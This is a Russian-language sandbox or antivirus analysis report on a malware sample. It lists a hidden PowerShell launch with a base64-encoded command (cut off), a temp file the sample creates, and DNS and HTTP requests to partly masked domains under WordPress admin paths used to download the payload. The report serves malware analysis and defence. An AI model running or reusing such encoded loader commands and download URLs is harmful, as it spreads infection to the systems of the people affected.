Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAHQAcABwAHYAcQBwAHYAeAA9ACcATQBsAHgAcAB3AHYAcwBjAGMAZQByACcAOwAkAFMAeQB0AHEAZwBnAGEAbwB0AHQAYwByACAAPQAgACcANgA5ADMAJwA7ACQAQQBoAGMAcgB5AGIAYQBoAHkAagBlAHEAPQAnAFoAZAB4AGIAdwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1370921.cvr
Сетевая активность
Подключается к
- 'be###ygroup.com':80
- 'ek#####ografcilik.com':80
- 'ek#####ografcilik.com':443
- 'fa###axhost.com':80
- 'in#.###o3.fcomet.com':80
TCP
Запросы HTTP GET
- http://be###ygroup.com/wp-admin/9MmF/
- http://ek#####ografcilik.com/administrator/dm3cou/
- http://fa###axhost.com/Nets.eu/7Lzn9wt/
- http://in#.###o3.fcomet.com/wp-admin/jv/
Другие
- 'ek#####ografcilik.com':443
UDP
- DNS ASK be###ygroup.com
- DNS ASK dd###der.com
- DNS ASK ek#####ografcilik.com
- DNS ASK fa###axhost.com
- DNS ASK in#.###o3.fcomet.com
